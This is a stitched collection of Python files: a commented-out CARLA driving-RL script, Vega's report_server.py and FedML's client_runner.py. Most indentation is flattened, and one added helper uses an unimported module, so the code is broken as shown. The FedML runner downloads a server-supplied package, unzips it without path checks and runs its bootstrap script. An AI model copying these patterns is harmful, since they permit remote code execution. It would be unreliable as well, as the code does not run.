# scene_label = tf.placeholder(shape=[None, 11], dtype=tf.int32)
# global_step = tf.Variable(0, trainable=False, name='global_step')
# lr = tf.placeholder(dtype=tf.float32)
#
# ## TF GRAPH ##
# scene_logits, action = model(input, is_training=True)
#
# clf_loss = tf.reduce_sum(tf.nn.softmax_cross_entropy_with_logits(labels=scene_label, logits=scene_logits))
#
# ops_loss = tf.reduce_sum(tf.square(action - std_action))
#
# loss = clf_loss + 100.*ops_loss
#
# ## UPDATE OPS ##
# bn_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
# with tf.control_dependencies(bn_ops):
# optimizer = tf.train.AdamOptimizer(learning_rate=lr, epsilon=1e-8)
# grads_and_vars = optimizer.compute_gradients(loss)
# ## clip the gradients ##
# capped_gvs = [(tf.clip_by_value(grad, -5., 5.), var)
# for grad, var in grads_and_vars if grad != None]
# update_ops = optimizer.apply_gradients(capped_gvs, global_step=global_step)
#
# init = tf.global_variables_initializer()
# saver = tf.train.Saver(tf.global_variables())
# ckpt = tf.train.get_checkpoint_state(FLAGS.checkpoint_dir)
#
# logger.info('Build tensorflow graph finish...')
# logger.info('Total trainable parameters:%s' %
# str(np.sum([np.prod(v.get_shape().as_list()) for v in tf.trainable_variables()])))
#
#
# #### carla world init ####
# client = carla.Client('127.0.0.1', 2000)
# client.set_timeout(10.0) # seconds
# logger.info('Carla connect success...')
#
# logger.info('Carla world initing...')
# world = client.get_world()
# destroy_all_actors(world)
#
# ## spawn vehicles in carla world
# spawn_vehicles(world, n_autopilots=100, n_egopilots=1)
# time.sleep(10)
#
# autopilots = get_all_autopilots(world)
# egopilots = get_all_egopilots(world)
#
# cameras = []
# obj_collisions = []
# logger.info('Adding some sensors to egopilots...')
# for egopilot in egopilots:
# ## attach a camera to egopilot ##
# bgr_camera_config['attach_to'] = egopilot
# bgr_sensor = bgr_camera(world, bgr_camera_config)
# cameras.append(bgr_sensor)
#
# ## attach collision sensor to egopilot ##
# collision_sensor_config['attach_to'] = egopilot
# collision_sensor = collision_query(world, collision_sensor_config)
# obj_collisions.append(collision_sensor)
#
#
# logger.info('Adding some sensors to egopilots success')
#
# # memory_pool = rl_tools.memory_pooling(maxlen=1000)
# memory_pool = rl_tools.balance_memory_pooling(max_capacity=1300, n_class=13)
# update_event = threading.Event()
#
# config = tf.ConfigProto()
# config.gpu_options.allow_growth = True
# with tf.Session(config=config) as sess:
# if ckpt:
# logger.info('loading %s...' % str(ckpt.model_checkpoint_path))
# saver.restore(sess, ckpt.model_checkpoint_path)
# logger.info('Load checkpoint success...')
# else:
# sess.run(init)
# logger.info('Actor variables init success...')
#
#
# s_t = threading.Thread(target=sample_thread, args=(sess,))
# u_t = threading.Thread(target=update_thread, args=(sess,))
# c_t = threading.Thread(target=check_whether_respawn_actors, args=(world, autopilots+egopilots,))
# s_t.daemon = True
# u_t.daemon = True
# c_t.daemon = True
# s_t.start()
# c_t.start()
#
# c_t.join()
# import math
#
# def gaussian_r(val, mu=65., sigma=30.):
# """calculate the reward of velocity
# Args:
# vel: velocity, km/h
# Return:
# a reward
# """
# # if vel > 80:
# # return 5.
#
# r = math.exp(-((val - mu) ** 2) / (2 * sigma ** 2))
# return r
#
#
# for i in range(-10, 10, 1):
# print(str(i/10)+' '+str(10 * (gaussian_r(i/10, mu=0., sigma=0.3)) - 5))
# spector_camera_config = {'data_type': 'sensor.camera.rgb', 'image_size_x': 626,
# 'image_size_y': 416, 'fov': 110, 'sensor_tick': 0.02,
# 'transform': carla.Transform(carla.Location(x=-6, z=3.5)),
# 'attach_to':None}
#
# def spawn(world, index=None):
# if not index:
# spawn_points = list(world.get_map().get_spawn_points())
# for i in range(len(spawn_points)):
# blueprints = world.get_blueprint_library().filter('vehicle.nissan.micra')
# blueprint = random.choice(blueprints)
# vehicle = world.try_spawn_actor(blueprint, spawn_points[i])
# print('i am in ', i)
# time.sleep(2)
# vehicle.destroy()
# else:
# spawn_points = list(world.get_map().get_spawn_points())
# blueprints = world.get_blueprint_library().filter('vehicle.nissan.micra')
# blueprint = random.choice(blueprints)
# vehicle = world.try_spawn_actor(blueprint, spawn_points[index])
# time.sleep(5)
# vehicle.destroy()
#
# client = carla.Client('127.0.0.1', 2000)
# client.set_timeout(10.0) # seconds
# logger.info('Carla connect success...')
#
# logger.info('Carla world initing...')
# world = client.get_world()
# destroy_all_actors(world)
#
# spawn_points = list(world.get_map().get_spawn_points())
#
# egopilot = spawn_egopilot_at(world, spawn_points[0])
# # obstacle_aheads = []
# logger.info('Adding some sensors to egopilots...')
#
# spector_camera_config['attach_to'] = egopilot
# spector = bgr_camera(world, spector_camera_config)
# time.sleep(2)
#
# for i, spawn_point in enumerate(spawn_points):
# respawn_actor_at(world, egopilot, spawn_point)
# time.sleep(1)
#
# sp_img = spector.get()
# sp_img = cv2.putText(sp_img, str(spawn_point.rotation), (10, 80), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 0, 255), 5)
#
# # cv2.imshow('vis', sp_img)
# # print(str(i)+' '+ str(spawn_point))
# # cv2.waitKey(2000)
# # cv2.destroyAllWindows()
#
# cv2.imwrite('./img/'+str(i)+'.jpg', sp_img)
# pass
# import tensorflow as tf
#
# x = tf.Variable(100.)
# e = tf.exp(x)
# y = tf.log(1+e)
# dy = tf.gradients(y,x)
# with tf.Session() as sess:
# sess.run(tf.global_variables_initializer())
# print(sess.run(dy))
print(2**3)
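
# Minimal standalone sketch of the Gaussian velocity reward described in the
# commented-out gaussian_r() above: reward = exp(-(v - mu)^2 / (2 * sigma^2)).
# `gaussian_reward_sketch` is a hypothetical helper for illustration only; the
# mu/sigma defaults are taken from the comment block, not from live code.
def gaussian_reward_sketch(val, mu=65., sigma=30.):
    """Return a reward in (0, 1], peaking when val equals mu."""
    return math.exp(-((val - mu) ** 2) / (2 * sigma ** 2))
# e.g. gaussian_reward_sketch(65.) == 1.0, and the reward decays symmetrically as
# the velocity moves away from 65 km/h.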
|
report_server.py
|
# -*- coding: utf-8 -*-
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the MIT License.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# MIT License for more details.
"""Report."""
import json
import logging
import os
import glob
import pickle
import time
import random
from copy import deepcopy
import numpy as np
import pandas as pd
from threading import Lock
from collections import OrderedDict
from threading import Thread
import vega
from vega.common import FileOps, TaskOps
from vega.common.general import General
from .record import ReportRecord
from .report_persistence import ReportPersistence
from vega.common import MessageServer
from vega.common.utils import singleton
from vega.common.pareto_front import get_pareto_index
__all__ = ["ReportServer"]
logger = logging.getLogger(__name__)
_records_lock = Lock()
_modified = False
@singleton
class ReportServer(object):
"""Report server."""
def __init__(self):
self._hist_records = OrderedDict()
self.persistence = ReportPersistence()
self._start_save_report_thread()
self.old_not_finished_workers = []
def run(self):
"""Run report server."""
MessageServer().register_handler("query_report", query_report)
MessageServer().register_handler("update_record", update_record)
MessageServer().register_handler("get_record", get_record)
@property
def all_records(self):
"""Get all records."""
return deepcopy(list(self._hist_records.values()))
def print_best(self, step_name):
"""Print best performance and desc."""
records = self.get_pareto_front_records(step_name)
return [dict(worker_id=record.worker_id, performance=record._performance) for record in records]
def pareto_front(self, step_name=None, nums=None, records=None):
"""Get parent front. pareto."""
if records is None:
records = self.all_records
records = list(filter(lambda x: x.step_name == step_name and x.performance is not None, records))
records = [record for record in records if record.rewards_compeleted]
if not records:
            return []
try:
rewards = [record.rewards if isinstance(record.rewards, list) else [record.rewards] for record in records]
indexes = get_pareto_index(np.array(rewards)).tolist()
return [record for i, record in enumerate(records) if indexes[i]]
except Exception as ex:
logging.error('No pareto_front_records found, ex=%s', ex)
return []
def get_step_records(self, step_name=None):
"""Get step records."""
if not step_name:
step_name = General.step_name
records = self.all_records
filter_steps = [step_name] if not isinstance(step_name, list) else step_name
records = list(filter(lambda x: x.step_name in filter_steps, records))
return records
def get_record(self, step_name, worker_id):
"""Get records by step name and worker id."""
records = self.all_records
records = list(filter(lambda x: x.step_name == step_name and x.worker_id == worker_id, records))
return records[0]
def get_last_record(self):
"""Get last records."""
if not self.all_records:
return None
return self.all_records[-1]
def get_pareto_front_records(self, step_name=None, nums=None, selected_key=None, choice=None):
"""Get Pareto Front Records."""
if not step_name:
step_name = General.step_name
records = self.all_records
if selected_key is not None:
new_records = []
selected_key.sort()
for record in records:
record._objective_keys.sort()
if record._objective_keys == selected_key:
new_records.append(record)
records = new_records
filter_steps = [step_name] if not isinstance(step_name, list) else step_name
records = list(filter(lambda x: x.step_name in filter_steps and x.performance is not None, records))
if records:
not_finished = [x.worker_id for x in records if not x.rewards_compeleted]
records = [x for x in records if x.rewards_compeleted]
if not_finished and set(not_finished) != set(self.old_not_finished_workers):
self.old_not_finished_workers = not_finished
logging.info(f"waiting for the workers {str(not_finished)} to finish")
if not records:
return []
pareto = self.pareto_front(step_name, nums, records=records)
if not pareto:
return []
if choice is not None:
return [random.choice(pareto)]
else:
return pareto
@classmethod
def restore(cls):
"""Transfer cvs_file to records."""
step_path = TaskOps().step_path
_file = os.path.join(step_path, ".reports")
if os.path.exists(_file):
with open(_file, "rb") as f:
data = pickle.load(f)
cls._hist_records = data[0]
cls.__instances__ = data[1]
def backup_output_path(self):
"""Back up output to local path."""
backup_path = TaskOps().backup_base_path
if backup_path is None:
return
FileOps.copy_folder(TaskOps().local_output_path, backup_path)
def output_pareto_front(self, step_name):
"""Save one records."""
logging.debug("All records in report, records={}".format(self.all_records))
records = deepcopy(self.get_pareto_front_records(step_name))
logging.debug("Filter step records, records={}".format(records))
if not records:
logging.warning("Failed to dump pareto front records, report is emplty.")
return
self._output_records(step_name, records)
def output_step_all_records(self, step_name):
"""Output step all records."""
records = self.all_records
logging.debug("All records in report, records={}".format(self.all_records))
records = list(filter(lambda x: x.step_name == step_name, records))
logging.debug("Filter step records, records={}".format(records))
if not records:
logging.warning("Failed to dump records, report is emplty.")
return
self._output_records(step_name, records)
def _output_records(self, step_name, records):
"""Dump records."""
columns = ["worker_id", "performance", "desc"]
outputs = []
for record in records:
record = record.serialize()
_record = {}
for key in columns:
_record[key] = record[key]
outputs.append(deepcopy(_record))
data = pd.DataFrame(outputs)
step_path = FileOps.join_path(TaskOps().local_output_path, step_name)
FileOps.make_dir(step_path)
_file = FileOps.join_path(step_path, "output.csv")
try:
data.to_csv(_file, index=False)
except Exception:
logging.error("Failed to save output file, file={}".format(_file))
for record in outputs:
worker_id = record["worker_id"]
worker_path = TaskOps().get_local_worker_path(step_name, worker_id)
outputs_globs = []
outputs_globs += glob.glob(FileOps.join_path(worker_path, "desc_*.json"))
outputs_globs += glob.glob(FileOps.join_path(worker_path, "hps_*.json"))
outputs_globs += glob.glob(FileOps.join_path(worker_path, "model_*"))
outputs_globs += glob.glob(FileOps.join_path(worker_path, "performance_*.json"))
for _file in outputs_globs:
if os.path.isfile(_file):
FileOps.copy_file(_file, step_path)
elif os.path.isdir(_file):
FileOps.copy_folder(_file, FileOps.join_path(step_path, os.path.basename(_file)))
def set_step_names(self, step_names):
"""Add step information."""
global _records_lock, _modified
with _records_lock:
_modified = True
self.persistence.set_step_names(step_names)
def update_step_info(self, **kwargs):
"""Update step information."""
global _records_lock, _modified
with _records_lock:
_modified = True
self.persistence.update_step_info(**kwargs)
def __repr__(self):
"""Override repr function."""
return str(self.all_records)
@classmethod
def load_records_from_model_folder(cls, model_folder):
"""Transfer json_file to records."""
if not model_folder or not os.path.exists(model_folder):
logging.error("Failed to load records from model folder, folder={}".format(model_folder))
return []
records = []
pattern_model_desc = FileOps.join_path(model_folder, "desc_*.json")
pattern_hps = FileOps.join_path(model_folder, "hps_*.json")
model_desc_files = glob.glob(pattern_model_desc)
hps_files = glob.glob(pattern_hps)
for _file in model_desc_files:
try:
with open(_file) as f:
desc = json.load(f)
worker_id = _file.split(".")[-2].split("_")[-1]
weights_file = os.path.join(os.path.dirname(_file), "model_{}".format(worker_id))
if vega.is_torch_backend():
weights_file = '{}.pth'.format(weights_file)
elif vega.is_ms_backend():
weights_file = '{}.ckpt'.format(weights_file)
if not os.path.exists(weights_file):
weights_file = None
hps_file = os.path.join(os.path.dirname(_file), os.path.basename(_file).replace("desc_", "hps_"))
hps = None
if hps_file in hps_files:
hps = cls._load_hps(hps_file)
hps_files.remove(hps_file)
sample = dict(worker_id=worker_id, desc=desc, weights_file=weights_file, hps=hps)
record = ReportRecord().load_dict(sample)
records.append(record)
except Exception as ex:
logging.info('Can not read records from json because {}'.format(ex))
if len(hps_files) > 0:
for _file in hps_files:
try:
                    worker_id = _file.split(".")[-2].split("_")[-1]
                    hps = cls._load_hps(_file)
                    sample = dict(worker_id=worker_id, hps=hps)
record = ReportRecord().load_dict(sample)
records.append(record)
except Exception as ex:
logging.info('Can not read records from json because {}'.format(ex))
return records
@classmethod
def _load_hps(cls, hps_file):
with open(hps_file) as f:
hps = json.load(f)
if "trainer" in hps:
if "epochs" in hps["trainer"]:
hps["trainer"].pop("epochs")
if "checkpoint_path" in hps["trainer"]:
hps["trainer"].pop("checkpoint_path")
return hps
def _start_save_report_thread(self):
_thread = Thread(target=_dump_report, args=(self, self.persistence,))
_thread.daemon = True
_thread.start()
def update_record(step_name=None, worker_id=None, **kwargs):
"""Update record."""
if step_name is None or worker_id is None:
return {"result": "failed", "message": "request message missing step_name or worker id."}
kwargs["step_name"] = step_name
kwargs["worker_id"] = worker_id
uid = "{}_{}".format(step_name, worker_id)
global _records_lock, _modified
with _records_lock:
_modified = True
records = ReportServer()._hist_records
if uid in records:
records[uid].load_dict(kwargs)
logging.debug("update record: {}".format(records[uid].to_dict()))
else:
records[uid] = ReportRecord().load_dict(kwargs)
logging.debug("new record: {}".format(records[uid].to_dict()))
return {"result": "success", "data": records[uid].to_dict()}
def get_record(step_name=None, worker_id=None, **kwargs):
"""Get record."""
if step_name is None or worker_id is None:
return {"result": "failed", "message": "require message missing step_name or worker id."}
global _records_lock, _modified
with _records_lock:
uid = "{}_{}".format(step_name, worker_id)
records = ReportServer()._hist_records
if uid in records:
data = records[uid].to_dict()
else:
data = ReportRecord().to_dict()
return {"result": "success", "data": data}
def _dump_report(report_server, persistence):
while True:
time.sleep(1)
global _records_lock, _modified
with _records_lock:
if not _modified:
continue
all_records = report_server.all_records
_modified = False
try:
persistence.save_report(all_records)
# TODO
# persistence.pickle_report(report_server._hist_records, report_server.__instances__)
report_server.backup_output_path()
except Exception as e:
logging.warning(f"Failed to dump reports, message={str(e)}")
def query_report():
global _records_lock
with _records_lock:
all_records = ReportServer().all_records
return ReportServer().persistence.get_report(all_records)
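
# Minimal standalone sketch of the Pareto-front filtering that
# ReportServer.pareto_front() delegates to vega.common.pareto_front.get_pareto_index.
# `_pareto_mask_sketch` is a hypothetical helper for illustration only, assuming
# rewards are maximized; it is not the library implementation.
def _pareto_mask_sketch(rewards):
    """Return a boolean list marking rows of `rewards` that are not dominated."""
    rewards = np.asarray(rewards, dtype=float)
    mask = []
    for i, row in enumerate(rewards):
        dominated = any(
            np.all(other >= row) and np.any(other > row)
            for j, other in enumerate(rewards) if j != i
        )
        mask.append(not dominated)
    return mask
# Example: _pareto_mask_sketch([[1.0, 0.2], [0.9, 0.9], [0.5, 0.1]]) keeps the first
# two points and drops the dominated third one.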
|
client_runner.py
|
import json
import multiprocessing
import os
import platform
import re
import shutil
import signal
import stat
import subprocess
import time
import traceback
import urllib
import uuid
import zipfile
from os.path import expanduser
import psutil
import requests
import yaml
from fedml.cli.edge_deployment.mqtt_manager import MqttManager
from fedml.cli.comm_utils.yaml_utils import load_yaml_config
from fedml.core.mlops import MLOpsMetrics
import click
from fedml.core.mlops.mlops_configs import MLOpsConfigs
LOCAL_HOME_RUNNER_DIR_NAME = 'fedml-client'
LOCAL_RUNNER_INFO_DIR_NAME = 'runner_infos'
LOCAL_PACKAGE_HOME_DIR_NAME = "fedml_packages"
class FedMLClientRunner:
def __init__(self, args, edge_id=0, request_json=None, agent_config=None):
self.current_training_status = None
self.mqtt_mgr = None
self.client_mqtt_mgr = None
self.edge_id = edge_id
self.process = None
self.args = args
self.request_json = request_json
self.version = args.version
self.device_id = args.device_id
self.cloud_region = args.cloud_region
self.cur_dir = os.path.split(os.path.realpath(__file__))[0]
if args.current_running_dir is not None:
self.cur_dir = args.current_running_dir
self.sudo_cmd = ""
self.is_mac = False
if platform.system() == "Darwin":
self.is_mac = True
self.agent_config = agent_config
self.fedml_data_base_package_dir = os.path.join("/", "fedml", "data")
self.fedml_data_local_package_dir = os.path.join("/", "fedml", "fedml-package", "fedml", "data")
self.fedml_data_dir = self.fedml_data_base_package_dir
self.fedml_config_dir = os.path.join("/", "fedml", "conf")
self.FEDML_DYNAMIC_CONSTRAIN_VARIABLES = {"${FEDSYS.RUN_ID}": "",
"${FEDSYS.PRIVATE_LOCAL_DATA}": "",
"${FEDSYS.CLIENT_ID_LIST}": "",
"${FEDSYS.SYNTHETIC_DATA_URL}": "",
"${FEDSYS.IS_USING_LOCAL_DATA}": "",
"${FEDSYS.CLIENT_NUM}": "",
"${FEDSYS.CLIENT_INDEX}": "",
"${FEDSYS.CLIENT_OBJECT_LIST}": "",
"${FEDSYS.LOG_SERVER_URL}": ""}
self.mlops_metrics = None
click.echo("Current directory of client agent: " + self.cur_dir)
@staticmethod
def generate_yaml_doc(run_config_object, yaml_file):
try:
file = open(yaml_file, 'w', encoding='utf-8')
yaml.dump(run_config_object, file)
file.close()
except Exception as e:
click.echo("Generate yaml file.")
def build_dynamic_constrain_variables(self, run_id, run_config):
data_config = run_config["data_config"]
server_edge_id_list = self.request_json["edgeids"]
        local_edge_id_list = [self.edge_id]
is_using_local_data = 0
private_data_dir = data_config["privateLocalData"]
synthetic_data_url = data_config["syntheticDataUrl"]
edges = self.request_json["edges"]
# if private_data_dir is not None \
# and len(str(private_data_dir).strip(' ')) > 0:
# is_using_local_data = 1
if private_data_dir is None or len(str(private_data_dir).strip(' ')) <= 0:
params_config = run_config.get("parameters", None)
private_data_dir = FedMLClientRunner.get_data_dir()
if synthetic_data_url is None or len(str(synthetic_data_url)) <= 0:
synthetic_data_url = private_data_dir
self.FEDML_DYNAMIC_CONSTRAIN_VARIABLES["${FEDSYS.RUN_ID}"] = run_id
self.FEDML_DYNAMIC_CONSTRAIN_VARIABLES["${FEDSYS.PRIVATE_LOCAL_DATA}"] = private_data_dir.replace(' ', '')
self.FEDML_DYNAMIC_CONSTRAIN_VARIABLES["${FEDSYS.CLIENT_ID_LIST}"] = str(local_edge_id_list).replace(' ', '')
self.FEDML_DYNAMIC_CONSTRAIN_VARIABLES["${FEDSYS.SYNTHETIC_DATA_URL}"] = synthetic_data_url.replace(' ', '')
self.FEDML_DYNAMIC_CONSTRAIN_VARIABLES["${FEDSYS.IS_USING_LOCAL_DATA}"] = str(is_using_local_data)
self.FEDML_DYNAMIC_CONSTRAIN_VARIABLES["${FEDSYS.CLIENT_NUM}"] = len(server_edge_id_list)
self.FEDML_DYNAMIC_CONSTRAIN_VARIABLES["${FEDSYS.CLIENT_INDEX}"] = server_edge_id_list.index(self.edge_id) + 1
client_objects = str(json.dumps(edges))
client_objects = client_objects.replace(" ", "").replace("\n", "").replace('"', '\\"')
self.FEDML_DYNAMIC_CONSTRAIN_VARIABLES["${FEDSYS.CLIENT_OBJECT_LIST}"] = client_objects
self.FEDML_DYNAMIC_CONSTRAIN_VARIABLES["${FEDSYS.LOG_SERVER_URL}"] = self.agent_config["ml_ops_config"][
"LOG_SERVER_URL"]
def unzip_file(self, zip_file, unzip_file_path):
result = False
if zipfile.is_zipfile(zip_file):
with zipfile.ZipFile(zip_file, 'r') as zipf:
zipf.extractall(unzip_file_path)
result = True
return result
def retrieve_and_unzip_package(self, package_name, package_url):
local_package_path = FedMLClientRunner.get_package_download_dir()
try:
os.makedirs(local_package_path)
except Exception as e:
click.echo("make dir")
local_package_file = os.path.join(local_package_path, os.path.basename(package_url))
if not os.path.exists(local_package_file):
urllib.request.urlretrieve(package_url, local_package_file)
unzip_package_path = FedMLClientRunner.get_package_unzip_dir()
try:
shutil.rmtree(FedMLClientRunner.get_package_run_dir(package_name), ignore_errors=True)
except Exception as e:
pass
self.unzip_file(local_package_file, unzip_package_path)
unzip_package_path = FedMLClientRunner.get_package_run_dir(package_name)
return unzip_package_path
def update_local_fedml_config(self, run_id, run_config):
packages_config = run_config["packages_config"]
# Copy config file from the client
unzip_package_path = self.retrieve_and_unzip_package(packages_config["linuxClient"],
packages_config["linuxClientUrl"])
fedml_local_config_file = os.path.join(unzip_package_path, "conf", "fedml.yaml")
# Load the above config to memory
config_from_container = load_yaml_config(fedml_local_config_file)
container_entry_file_config = config_from_container["entry_config"]
container_dynamic_args_config = config_from_container["dynamic_args"]
entry_file = container_entry_file_config["entry_file"]
conf_file = container_entry_file_config["conf_file"]
full_conf_path = os.path.join(unzip_package_path, "fedml", "config", os.path.basename(conf_file))
# Dynamically build constrain variable with realtime parameters from server
self.build_dynamic_constrain_variables(run_id, run_config)
# Update entry arguments value with constrain variable values with realtime parameters from server
# currently we support the following constrain variables:
# ${FEDSYS_RUN_ID}: a run id represented one entire Federated Learning flow
# ${FEDSYS_PRIVATE_LOCAL_DATA}: private local data path in the Federated Learning client
# ${FEDSYS_CLIENT_ID_LIST}: client list in one entire Federated Learning flow
# ${FEDSYS_SYNTHETIC_DATA_URL}: synthetic data url from server,
# if this value is not null, the client will download data from this URL to use it as
# federated training data set
# ${FEDSYS_IS_USING_LOCAL_DATA}: whether use private local data as federated training data set
container_dynamic_args_config["data_cache_dir"] = "${FEDSYS.PRIVATE_LOCAL_DATA}"
for constrain_variable_key, constrain_variable_value in self.FEDML_DYNAMIC_CONSTRAIN_VARIABLES.items():
for argument_key, argument_value in container_dynamic_args_config.items():
if argument_value is not None and str(argument_value).find(constrain_variable_key) == 0:
replaced_argument_value = str(argument_value).replace(constrain_variable_key,
str(constrain_variable_value))
container_dynamic_args_config[argument_key] = replaced_argument_value
# Merge all container new config sections as new config dictionary
package_conf_object = dict()
package_conf_object["entry_config"] = container_entry_file_config
package_conf_object["dynamic_args"] = container_dynamic_args_config
package_conf_object["dynamic_args"]["config_version"] = self.args.config_version
container_dynamic_args_config["mqtt_config_path"] = os.path.join(unzip_package_path,
"fedml", "config",
os.path.basename(container_dynamic_args_config[
"mqtt_config_path"]))
container_dynamic_args_config["s3_config_path"] = os.path.join(unzip_package_path,
"fedml", "config",
os.path.basename(container_dynamic_args_config[
"s3_config_path"]))
log_file_dir = FedMLClientRunner.get_log_file_dir()
try:
os.makedirs(log_file_dir)
except Exception as e:
pass
package_conf_object["dynamic_args"]["log_file_dir"] = log_file_dir
# Save new config dictionary to local file
fedml_updated_config_file = os.path.join(unzip_package_path, "conf", "fedml.yaml")
FedMLClientRunner.generate_yaml_doc(package_conf_object, fedml_updated_config_file)
# Build dynamic arguments and set arguments to fedml config object
self.build_dynamic_args(run_config, package_conf_object, unzip_package_path)
return unzip_package_path, package_conf_object
def build_dynamic_args(self, run_config, package_conf_object, base_dir):
fedml_conf_file = package_conf_object["entry_config"]["conf_file"]
fedml_conf_path = os.path.join(base_dir, "fedml", "config", os.path.basename(fedml_conf_file))
fedml_conf_object = load_yaml_config(fedml_conf_path)
# Replace local fedml config objects with parameters from MLOps web
parameters_object = run_config.get("parameters", None)
if parameters_object is not None:
fedml_conf_object = parameters_object
package_dynamic_args = package_conf_object["dynamic_args"]
fedml_conf_object["comm_args"]["mqtt_config_path"] = package_dynamic_args["mqtt_config_path"]
fedml_conf_object["comm_args"]["s3_config_path"] = package_dynamic_args["s3_config_path"]
fedml_conf_object["common_args"]["using_mlops"] = True
fedml_conf_object["train_args"]["run_id"] = package_dynamic_args["run_id"]
fedml_conf_object["train_args"]["client_id_list"] = package_dynamic_args["client_id_list"]
fedml_conf_object["train_args"]["client_num_in_total"] = int(package_dynamic_args["client_num_in_total"])
fedml_conf_object["train_args"]["client_num_per_round"] = int(package_dynamic_args["client_num_in_total"])
fedml_conf_object["device_args"]["worker_num"] = int(package_dynamic_args["client_num_in_total"])
fedml_conf_object["data_args"]["data_cache_dir"] = package_dynamic_args["data_cache_dir"]
fedml_conf_object["tracking_args"]["log_file_dir"] = package_dynamic_args["log_file_dir"]
fedml_conf_object["tracking_args"]["log_server_url"] = package_dynamic_args["log_server_url"]
if hasattr(self.args, "local_server") and self.args.local_server is not None:
fedml_conf_object["comm_args"]["local_server"] = self.args.local_server
bootstrap_script_file = fedml_conf_object["environment_args"]["bootstrap"]
bootstrap_script_path = os.path.join(base_dir, "fedml", "config", os.path.basename(bootstrap_script_file))
try:
os.makedirs(package_dynamic_args["data_cache_dir"])
except Exception as e:
pass
fedml_conf_object["dynamic_args"] = package_dynamic_args
FedMLClientRunner.generate_yaml_doc(fedml_conf_object, fedml_conf_path)
try:
bootstrap_stat = os.stat(bootstrap_script_path)
os.chmod(bootstrap_script_path, bootstrap_stat.st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
os.system(bootstrap_script_path)
except Exception as e:
click.echo("Exception when executing bootstrap.sh: {}", traceback.format_exc())
def build_image_unique_id(self, run_id, run_config):
config_name = str(run_config.get("configName", "run_" + str(run_id)))
        config_creator = str(run_config.get("userId", "user_" + str(run_id)))
        image_unique_id = re.sub('[^a-zA-Z0-9_-]', '', str(config_name + "_" + config_creator))
image_unique_id = image_unique_id.lower()
return image_unique_id
def run(self):
run_id = self.request_json["runId"]
run_config = self.request_json["run_config"]
data_config = run_config["data_config"]
packages_config = run_config["packages_config"]
self.setup_client_mqtt_mgr()
# get training params
private_local_data_dir = data_config.get("privateLocalData", "")
is_using_local_data = 0
# if private_local_data_dir is not None and len(str(private_local_data_dir).strip(' ')) > 0:
# is_using_local_data = 1
# start a run according to the hyper-parameters
# fedml_local_data_dir = self.cur_dir + "/fedml_data/run_" + str(run_id) + "_edge_" + str(edge_id)
fedml_local_data_dir = os.path.join(self.cur_dir, "fedml_data")
fedml_local_config_dir = os.path.join(self.cur_dir, "fedml_config")
if is_using_local_data:
fedml_local_data_dir = private_local_data_dir
self.fedml_data_dir = self.fedml_data_local_package_dir
# update local config with real time parameters from server and dynamically replace variables value
unzip_package_path, fedml_config_object = self.update_local_fedml_config(run_id, run_config)
entry_file_config = fedml_config_object["entry_config"]
dynamic_args_config = fedml_config_object["dynamic_args"]
entry_file = os.path.basename(entry_file_config["entry_file"])
conf_file = entry_file_config["conf_file"]
FedMLClientRunner.cleanup_learning_process()
os.chdir(os.path.join(unzip_package_path, "fedml"))
python_program = 'python'
python_version_str = os.popen("python --version").read()
if python_version_str.find("Python 3.") == -1:
python_version_str = os.popen("python3 --version").read()
if python_version_str.find("Python 3.") != -1:
python_program = 'python3'
process = subprocess.Popen([python_program, entry_file,
'--cf', conf_file, '--rank', str(dynamic_args_config["rank"])])
FedMLClientRunner.save_learning_process(process.pid)
def reset_devices_status(self, edge_id):
self.mlops_metrics.broadcast_client_training_status(edge_id, MqttManager.MSG_MLOPS_CLIENT_STATUS_FINISHED)
def stop_run(self):
self.setup_client_mqtt_mgr()
self.reset_devices_status(self.edge_id)
try:
FedMLClientRunner.cleanup_learning_process()
except Exception as e:
pass
click.echo("Stop run successfully.")
def setup_client_mqtt_mgr(self):
if self.client_mqtt_mgr is None:
self.client_mqtt_mgr = MqttManager(
self.agent_config["mqtt_config"]["BROKER_HOST"],
self.agent_config["mqtt_config"]["BROKER_PORT"],
self.agent_config["mqtt_config"]["MQTT_USER"],
self.agent_config["mqtt_config"]["MQTT_PWD"],
self.agent_config["mqtt_config"]["MQTT_KEEPALIVE"],
"ClientAgent_Comm_Client" + str(uuid.uuid4()),
)
time.sleep(3)
if self.mlops_metrics is None:
self.mlops_metrics = MLOpsMetrics()
self.mlops_metrics.set_messenger(self.client_mqtt_mgr)
@staticmethod
def exit_process(process):
if process is None:
return
try:
process.terminate()
process.join()
process = None
except Exception as e:
pass
def callback_start_train(self, topic, payload):
# get training params
request_json = json.loads(payload)
run_id = request_json["runId"]
# Terminate previous process about starting or stopping run command
FedMLClientRunner.exit_process(self.process)
FedMLClientRunner.cleanup_run_process()
FedMLClientRunner.save_runner_infos(self.args.device_id + "." + self.args.os_name, self.edge_id, run_id=run_id)
# Start cross-silo server with multi processing mode
self.request_json = request_json
client_runner = FedMLClientRunner(self.args, edge_id=self.edge_id,
request_json=request_json,
agent_config=self.agent_config)
self.process = multiprocessing.Process(target=client_runner.run)
self.process.start()
FedMLClientRunner.save_run_process(self.process.pid)
# self.run()
def callback_stop_train(self, topic, payload):
click.echo("callback_stop_train: topic = %s, payload = %s" % (topic, payload))
# Notify MLOps with the stopping message
self.mlops_metrics.report_client_training_status(self.edge_id,
MqttManager.MSG_MLOPS_CLIENT_STATUS_STOPPING)
request_json = json.loads(payload)
run_id = request_json["runId"]
click.echo("Stopping run...")
click.echo("Stop run with multiprocessing.")
# Stop cross-silo server with multi processing mode
self.request_json = request_json
client_runner = FedMLClientRunner(self.args, edge_id=self.edge_id,
request_json=request_json,
agent_config=self.agent_config)
try:
multiprocessing.Process(target=client_runner.stop_run).start()
except Exception as e:
pass
def cleanup_client_with_finished_status(self):
self.setup_client_mqtt_mgr()
self.stop_run()
@staticmethod
def get_fedml_home_dir():
home_dir = expanduser("~")
fedml_home_dir = os.path.join(home_dir, LOCAL_HOME_RUNNER_DIR_NAME)
return fedml_home_dir
@staticmethod
def get_log_file_dir():
log_file_dir = os.path.join(FedMLClientRunner.get_fedml_home_dir(), "fedml", "logs")
return log_file_dir
@staticmethod
def get_data_dir():
data_dir = os.path.join(FedMLClientRunner.get_fedml_home_dir(), "fedml", "data")
return data_dir
